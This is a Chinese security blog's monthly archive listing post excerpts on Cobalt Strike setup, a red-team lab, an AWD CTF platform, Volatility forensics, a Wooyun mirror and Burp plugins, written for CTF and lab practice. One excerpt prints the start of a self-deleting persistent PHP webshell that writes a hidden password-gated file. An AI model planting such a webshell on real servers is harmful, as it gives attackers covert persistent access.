09 2020 档案
发表于 2020-09-22 01:57阅读:4915评论:2推荐:0
摘要:CobaltStrike3.14&3.8安装&中文乱码解决 工具简介 Cobalt Strike 一款以 Metasploit 为基础的 GUI 框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell 木马生成等。钓鱼攻击包括:站点克隆,目标信息获取,
阅读全文 »
发表于 2020-09-18 00:27阅读:4644评论:1推荐:0
摘要:靶场描述: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有
阅读全文 »
发表于 2020-09-13 20:14阅读:3359评论:0推荐:1
摘要:开学后实验室来了几个新同学,在线上CTF方面大家一直在持续学习,但AWD模式的CTF我们练习并不多,所以准备搭建一个AWD平台用于实验室成员的线下赛攻防练习。 最开始的是防灾科技大学的线下AWD靶场: https://github.com/glzjin/20190511_awd_docker 但是靶
阅读全文 »
发表于 2020-09-10 21:47阅读:1602评论:0推荐:0
摘要:工具下载: Linux环境 apt-get install volatility 各种依赖的安装,(视情况安装) #Distorm3:牛逼的反编译库 pip install distorm3 #Yara:恶意软件分类工具 pip install yara #PyCrypto:加密工具集 pi
阅读全文 »
发表于 2020-09-06 02:51阅读:6570评论:3推荐:1
摘要:一个简单的不死马如: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325
阅读全文 »
发表于 2020-09-05 13:38阅读:1902评论:0推荐:1
摘要:AWD比赛防止没有网络,在移动硬盘里面准备一个乌云漏洞库。 之前也想过弄一个乌云的镜像网站,无奈学生机性能太低下了,部署到公网上服务器存储空间都不够,只能部署在本地硬盘了。 乌云镜像的开源地址:https://github.com/m0l1ce/wooyunallbugs 文件的百度网盘下载链接:h
阅读全文 »
发表于 2020-09-04 23:15阅读:4199评论:0推荐:3
摘要:这段时间都没更博客,扫描器的更新也暂时停止了,因为回了学校之后需要准备实验室招新和几个比赛的事情,内疚两秒钟,赶快学习! burp里面的插件很多,但是不要被纷繁复杂的功能迷了双眼,还是那句话:适合自己的才是最好的。只有需要用到的时候根据需求寻找插件再去下载安装,才能起到最大的作用,如果仅仅是为了充实
阅读全文 »
